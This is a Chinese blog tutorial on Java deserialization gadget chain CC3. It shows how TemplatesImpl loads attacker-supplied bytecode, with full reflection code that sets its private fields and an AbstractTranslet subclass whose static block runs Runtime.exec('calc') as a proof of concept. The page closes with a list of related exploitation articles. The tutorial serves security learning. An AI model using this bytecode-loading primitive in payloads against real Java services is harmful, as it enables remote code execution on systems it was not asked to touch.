java cc链3 TemplatesImpl类加载

最新推荐文章于 2024-11-01 11:30:18 发布
最新推荐文章于 2024-11-01 11:30:18 发布
阅读量1k 收藏 17
点赞数 18
文章标签: 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135611620
版权

java cc链3 TemplatesImpl类加载
使用url加载类
创建一个test类,只存在一段静态代码,构建为class文件,

package com.example;
public class test {
    static {
        System.out.println("aaaaa");
        }}

我这里把构建完成的test.class文件复制到D:/abc目录下,然后使用URLClassLoader进行加载,可以看到控制台正常输出aaaaa字段

public static void main(String[] args) throws Exception {
    URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///D:\\abc\\")});
    Class<?> a = urlClassLoader.loadClass("test");
    a.newInstance(); 
}

注意事项,由于test类存在package com.example;这里直接写urlClassLoader.loadClass("test");是没有问题的,但如果自己的是package org.example;,就会出错,需要修改为Class<?> a = urlClassLoader.loadClass("org.example.test")才能够正常执行,或者test类中直接删除package com.example;这一行即可

通过字节码进行类加载
使用上文创建的test类

public class test {
    static {
        System.out.println("aaaaa");
        }}

构建为class文件,读取class字节码,通过defineclass创建实例

ClassLoader systemClassLoader = ClassLoader.getSystemClassLoader();
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
defineClass.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D:\\abc\\test.class"));
Class test = (Class) defineClass.invoke(systemClassLoader, "test",code, 0, code.length);
test.newInstance();

会发现控制台正常输出 aaaaa,这里是由于defineClass是私有属性,所以通过反射的方式进行调用。

这里将test.java的内容更改为

  public class test {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

通过字节码加载的方式可以实现执行代码的效果。
在cc链1中是用的是InvokerTransformer.transform反射加载Runtime.class进而执行系统命令,如果能够找到一个接口调用了defineClassnewInstance(),符合加载字节码代码执行的条件,就可以将InvokerTransformer.transform进行替换

这里使用TemplatesImpl类,在getTransletInstance()方法中调用了defineTransletClasses()方法,并且刚好存在defineClassnewInstance()方法,并且getTransletInstance()在public方法newTransformer()中,满足方法中的条件,直到字节码实例的创建。

public synchronized Transformer newTransformer()
    throws TransformerConfigurationException
{
    TransformerImpl transformer;

    transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
        _indentNumber, _tfactory);

创建TemplatesImpl()类调用newTransformer()方法,进入getTransletInstance()方法

TemplatesImpl templates = new TemplatesImpl();
templates.newTransformer();

private Translet getTransletInstance()
    throws TransformerConfigurationException {
    try {
        if (_name == null) return null;

        if (_class == null) defineTransletClasses();

        // The translet needs to keep a reference to all its auxiliary
        // class to prevent the GC from collecting them
        AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();

这里进入defineTransletClasses()方法,调用defineclass方法,在运行newInstance()创建实例,这里需要_name不为空,通过反射修改_name属性值

        Class tc=templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"aaaa");

进入defineTransletClasses()方法,

private void defineTransletClasses()
    throws TransformerConfigurationException {

    if (_bytecodes == null) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
        throw new TransformerConfigurationException(err.toString());
    }

    TransletClassLoader loader = (TransletClassLoader)
        AccessController.doPrivileged(new PrivilegedAction() {
            public Object run() {
                return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
            }
        });

    try {
        final int classCount = _bytecodes.length;
        _class = new Class[classCount];

        if (classCount > 1) {
            _auxClasses = new HashMap<>();
        }

        for (int i = 0; i < classCount; i++) {
            _class[i] = loader.defineClass(_bytecodes[i]);
            final Class superClass = _class[i].getSuperclass();

            // Check if this is the main class
            if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                _transletIndex = i;
            }
            else {
                _auxClasses.put(_class[i].getName(), _class[i]);
            }
        }

首先在

if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

这个条件判断中_bytecodes不能为空,否则会报错退出,

TransletClassLoader loader = (TransletClassLoader)
    AccessController.doPrivileged(new PrivilegedAction() {
        public Object run() {
            return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
        }
    });

这个方法中_tfactory不能为空,要不然会出现空指针错误(找不到getExternalExtensionsMap()方法),
查找到

private transient TransformerFactoryImpl _tfactory = null;

使用transient修饰,该字段不能被序列化,在readObject中对_tfactory赋值为

_tfactory = new TransformerFactoryImpl();

那么添加

Field tfactory = tc.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());

在接下来的for循环中,_bytecodes为二维数组,通过for循环遍历一唯数组,

private byte[][] _bytecodes = null;
for (int i = 0; i < classCount; i++) {
      _class[i] = loader.defineClass(_bytecodes[i]);

进入defineClass中,根据之前的字节码创建实例,这里传入的_bytecodes[i]应该是读取的字节码,

 Class defineClass(final byte[] b) {
            return defineClass(null, b, 0, b.length);
        }

添加为

Field bytecodes = tc.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("D:\\abc\\ceshi.class"));
byte[][] codes= {code};
 bytecodes.set(templates,codes);

这里的二维数组只有一个一维数组,所以for循环为

for (int i = 0; i < 1; i++)

i的取值只有0
在下面的if条件判断中

 for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

            if (_transletIndex < 0) {
                ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
                throw new TransformerConfigurationException(err.toString());
            }

在两个if判断中,只需要满足superClass.getName().equals(ABSTRACT_TRANSLET)=true即可
其实在readObject中可以找到

_transletIndex = gf.get("_transletIndex", -1);

_transletIndex的默认值为-1,如果进入_auxClasses.put(_class[i].getName(), _class[i]);判断,下一步的if判断if (_transletIndex < 0) 还是会报错退出,还想要执行外部的newInstance()方法,

这里查看ABSTRACT_TRANSLET的属性值

private static String ABSTRACT_TRANSLET
    = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

也就是说父类需要为AbstractTranslet,由于这里的superClass其实是

_class[i] = loader.defineClass(_bytecodes[i]);
 final Class superClass = _class[i].getSuperclass();

传入的字节码的父类,所以这里需要对test.class进行修改
导入类,继承AbstractTranslet父类1

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
public class ceshi extends AbstractTranslet{
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

由于AbstractTranslet是个抽象类,需要实现AbstractTranslet的两个方法(导入类,继承方法后,点击给出的提示即可)

那么到现在,通过TemplatesImpl类,已经完成了字节码实例加载,完整的代码如下

test08.java
package org.example;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class test08 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class tc=templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"aaaa");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("D:\\abc\\ceshi.class"));
        byte[][] codes= {code};
        bytecodes.set(templates,codes);
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        templates.newTransformer();

    }
}

ceshi.java
import java.io.IOException;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class ceshi extends AbstractTranslet{
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }


    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

这里的ceshi就是上文中的test,构建执行,弹出calc,说明已经执行了ceshi.class的内容, 建议先观看白日梦组长基础篇关于动态类加载,再看cc链3,
参考
白日梦组长

天下是个小趴菜
关注
[Java反序列化]—Shiro反序列化(二)
snowlyzz的博客
12-06 561
shiro RCE利用
“白痴“上帝视角调节反序列化CC2
HBohan的博客
09-28 214
说是白痴上帝视角的原因在于我们拿到了poc,模拟不知道任何细节,去分析这个漏洞的形成原因。也可以说半黑盒状态,主要是锻炼一下分析能力。CC1的分析已经在之前的文章发过了。主要是拿来入门的,现在我们分析一下CC2.这篇文章也是重构,很早之前分析了一次,但是当时水平比现在还低,所以很多地方还不够清楚。现在重新分析一下。需要涉及到以下的知识点 javassist动态编程(主要是字节码修改操作,把他可以看成一个加强版的反射) 本来开始直接跟着poc调的,poc不是特别的友好,很多地方不清楚,那我们还是借助poc逆.
爆赞好文之java动态字节码加载(TemplatesImpl)简谈
2301_79724395的博客
04-17 1242
虽然已经学过了,不过忘完了,nice,重学动态加载就是很动态知道吧,你以为,说了等于没说,怎么个动态法呢?具体是在于三个函数loadClass()从已经加载缓存、父加载器等位置寻找(其实就是双亲委派机制),在前面没有找到的情况下执行findClassfindClass()根据基础URL指定的方法来加载的字节码,可能会在本地文件系统,jar包,或是远程http服务器上读取字节码,然后交给下一个函数defineClass()的作用就是处理前面传入的字节码,将其处理为真正的Java
WebJava反序列化之从CC3看TemplatesImpl的利用
uuzeray的博客
02-29 1312
都在InvokerTransformer上,若WAF直接禁用了该,我们可以用CC3来突破,CC3的sink在于上面提到的TemplatesImpl的newTransformer方法,它最后会调用defineClass(),将字节码初始化成一个可控的,若该是有着精心构造的静态方法的恶意,便可以完成攻击。在 Java 反序列化漏洞中,攻击者通常会构造恶意的序列化数据,通过触发反序列化操作来执行恶意代码。那么,接下来的问题是,从哪里去触发TemplatesImpl的newTransformer方法呢?
Java反序列化利用篇 | CC3分析、TemplatesImpl中的调用、TrAXFilter、InstantiateTransformer的transform()【本系列文章的重点】
哦 卷!
09-22 814
入口 source调用 gadget chain执行 sink方式执行恶意代码。动态类加载任意方式执行恶意代码。而入口source和调用gadget chain可以有很多组合,Java反序列化CC调用中都是不同的组合型。那接下来就是寻找方法的调用,其实这里可以接上CC1的前半部分调用了,通过来进行调用。即将放入中,然后按照CC1的方式调用即可。// 传入TrAXFilter.class,返回TrAXFilter.class,当做下一个transform的参数。
Java反序列化-CC3
永远都没有了
04-22 620
CC3笔记。CC3通过字节码文件,动态类加载来进行命令执行,达到绕过服务器的黑名单的一条
Java动态类加载
Le1a's Blog
03-23 5899
Java动态类加载 文章首发自: https://www.le1a.com/posts/9d41d3f8/ 前言 前面学习了反序列化,正准备趁热打铁去学cc3了,但是发现cc3需要用到动态类加载,就先来学一下。 利用URLClassLoader加载远程class文件 首先了解下什么是ClassLoader? ClassLoader是一个"加载器",它会让Java虚拟机知道如何加载这个。默认的ClassLoader是根据名来加载的,这个名必须是的完整路径(跟反射有点似),例如java.lang.R
Java代码审计——Commons Collections2 TemplatesImpl底层调用
王嘟嘟的博客
11-25 1146
0x00 前言 分析完了CC1和TransformedMap,接着来看CC2这个,看了一些文章,但是仅仅是看的话,无法真切的理解其中的含义,所以需要进行自己分析,并且记录其中关键点。这一篇主要是把底层调用遇到的问题讲清楚。 0x01 底层调用 底层调用分为两层,一层是Java字节化,一层是通过TemplatesImpl进行调用。 1.Java字节化 这里Java字节化选择的是Javassist。 简单的说一下Javassist,Javassist主要是用来做动态生成Java的库,可以从输入的内
CC3(动态加载字节码)
..
10-18 478
严格来说,Java字节码(ByteCode)其实仅仅指的是Java虚拟机执行使用的一指令,通常被存储在.class文件中。众所周知,不同平台、不同CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这 些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台 的JVM虚拟机中。
Java反序列化之Commons-Beanutils1与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1532
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
java反序列之Jdk7u21回显
m0_64354070的博客
12-06 2240
以前在打RMI反序列化的时候都是用的CC、CB利用实现报错回显,很好使。 之前在做一次项目的时候发现了目标存在RMI反序列化漏洞,系统为Windows,无DNS不出网。 通过延时探测出只存在Jdk7u21利用。 RMI回显 打目标时依然尝试使用老方法回显,Jdk7u21 + 报错回显,发现一直没回显。平时自己Jdk7u21利用用得比较少,大概了解Jdk7u21最后的利用也是通过Templatesimpl#newTransformer方法实现代码执行,只能去看代码分析下失败的原因。 Jdk7u
开发知识点-JAVA-springboot+Spring Security/Shiro
aming小老弟
02-18 640
Spring 还提供了一个名为 Spring Security 的子项目,用于处理应用程序的安全需求。Spring Security 可以与 Shiro 集成,以提供更强大的安全功能。Shiro 提供了一套灵活的安全管理功能,可以处理用户身份验证、访问控制、会话管理等任务。因此,可以说 Shiro 是一个独立的安全框架,而 Spring 平台可以与 Shiro 一起使用来增强应用程序的安全性。Shiro 和 Spring 平台是两个不同的项目,它们可以在一起使用来提供安全认证和授权功能。
2024年,Rust开发语言,现在怎么样了?
LiangGang365的专栏
10-27 1321
Rust到底好不好用,最终还是要看具体的业务场景应用。比如,目前用Rust来编写纯UI的前端,可能还不是很成熟。但在内存管理、安全性和性能优化等领域,Rust无疑是一种非常优秀的语言选择。国内华为、字节、百度、阿里、美团等在通用组件、基础平台系统都在使用rust,其他国内数据库厂商、交易所、理想汽车、小鹏汽车等,以及大量在区块、游戏行业提供的远程职位
网络安全(黑客)——自学2024
最新发布
2401_85026883的博客
11-01 1219
网络安全可以基于攻击和防御视角来分,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024“源鲁杯“高校网络安全技能大赛-Misc-WP
ASD830的博客
10-25 1840
题目给了一张图片,flag就在图片上,不过不太明显,写个python脚本处理一下读取后得到flag。
信而泰防火墙安全测试解决方案:为网络安全保驾护航
XINERTEL的博客
10-31 1064
在当今数字化时代,网络安全至关重要。防火墙作为网络安全的第一道防线,其性能和可靠性直接影响到网络的安全性。信而泰提供的防火墙安全测试解决方案,旨在通过全面的测试流程,确保防火墙能够高效、准确地执行其安全任务。针对防火墙不同的功能点,我们可以进行相应的测试。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1264
网络安全可以基于攻击和防御视角来分,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
企业应该采用和支持网络安全的几个实践
QQ3007250950的博客
10-31 996
总之,虽然这些实践乍一看很简单,但网络安全工程师必须记住它们的重要性。有时候,好的解决方案是最简单的。有了复杂的政策,就会产生混乱,这正是恶意行为者所希望看到的。当这些实践融入到组织的文化中时,效果会更好。
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
ZXW_NUDT的博客
10-19 9197
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值